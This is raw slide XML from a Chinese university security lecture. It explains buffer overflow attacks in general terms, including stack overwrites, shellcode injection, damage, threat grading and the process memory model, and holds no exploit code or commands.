              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>长度，可能导致溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="楷体_GB2312" pitchFamily="49"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dirty="0" smtClean="0"/>
              <a:t>利用目标程序的缓冲区溢出漏洞，向缓冲区写超其长度的内容，造成缓冲区溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>破坏程序的堆栈</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>超出部分写入（覆盖）其他缓冲区，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据、下一条指令指针，函数返回地址或是其他程序输出内容，</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使程序转而执行其它指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目标系统指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：通过缓冲区溢出注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290818" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>缓冲区溢出攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEF4E944-C727-464C-85A7-E70A1F27AC09}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull/>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Rot="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>平台上可获得一个交互式的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>平台上可上载并执行任何的代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>溢出漏洞发掘需较高技巧和知识背景</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>一旦有人编写出溢出代码，则用起来非常简单</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>与其他的攻击类型相比</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>不需要太多的先决条件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>杀伤力很强</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>技术性强</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>穿透防火墙</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159746" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>缓冲区溢出攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>危害性</a:t>
            </a:r>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en-US" altLang="zh-CN" smtClean="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>威胁与攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="副标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>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smtClean="0"/>
              <a:t>Copyright©</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>电子科技大学计算机学院</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60421" name="灯片编号占位符 5"/>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DBEAF26-32C9-4009-A4A2-112F9911A638}" type="slidenum">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>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noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>国际等级划分准则：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>级：个体信息犯罪，单点攻击，简单攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>手法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。有自动化、平台化趋势，但单点攻击作用有限。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>级：有组织分布式协同攻击，多点、多技术和协同攻击，相互掩护，危害大，难以对付。能够攻击一些专用网络、非标准网络。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>级：战争威胁，更大范围攻击，攻击技术更全面，危害更大。采用一切已知攻击手段，包括可控计算机病毒、信息炸弹、信息炮弹、网络安装软件、使用网络攻击平台、实施一定的战术方案等。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="616450" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>安全威胁分级</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73730" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5129336" y="6407944"/>
            <a:ext cx="1026840" cy="450056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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264120BB-4551-47A3-932A-FE937E060644}" type="datetime1">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rrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>操作系统给每个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进程分配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>独立虚拟地址空间</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>代码区、数据区和堆栈区。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123906"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smtClean="0"/>
              <a:t>缓冲区</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>溢出攻击的内存模型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="827584" y="4070350"/>
            <a:ext cx="3311525" cy="2095500"/>
            <a:chOff x="827584" y="4070350"/>
            <a:chExt cx="3311525" cy="2095500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25604" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1907084" y="4222750"/>
              <a:ext cx="2232025" cy="647700"/>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b="1"/>
                <a:t>代码段</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25605" name="Rectangle 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1907084" y="4870450"/>
              <a:ext cx="2232025" cy="647700"/>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b="1"/>
                <a:t>数据段</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25606" name="Rectangle 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1907084" y="5518150"/>
              <a:ext cx="2232025" cy="647700"/>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b="1"/>
                <a:t>堆栈段</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25607" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="827584" y="4070350"/>
              <a:ext cx="865187" cy="396875"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
                <a:t>CS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                  <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                </a:rPr>
                <a:t></a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25608" name="Text Box 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="827584" y="4718050"/>
              <a:ext cx="865187" cy="396875"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
                <a:t>DS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                  <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                </a:rPr>
                <a:t></a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25609" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="827584" y="5373688"/>
              <a:ext cx="865187" cy="396875"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
                <a:t>SS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1">
                  <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                </a:rPr>
                <a:t></a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="3861048"/>
            <a:ext cx="4248472" cy="26407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eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：程序机器码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和只读数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：程序静态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>动态数据。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>堆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和堆栈都可以被利用来进行溢出</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>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smtClean="0"/>
              <a:t>堆栈示意图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3562350" y="1428750"/>
            <a:ext cx="1800225" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31748" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3562350" y="1933575"/>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a:t>512</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31749" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3562350" y="2436813"/>
            <a:ext cx="1800225" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31750" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3563938" y="3444875"/>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a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31751" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3562350" y="2941638"/>
            <a:ext cx="1800225" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31752" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5508625" y="1428750"/>
            <a:ext cx="2017713" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>栈顶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ESP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31753" name="Text Box 10"/>
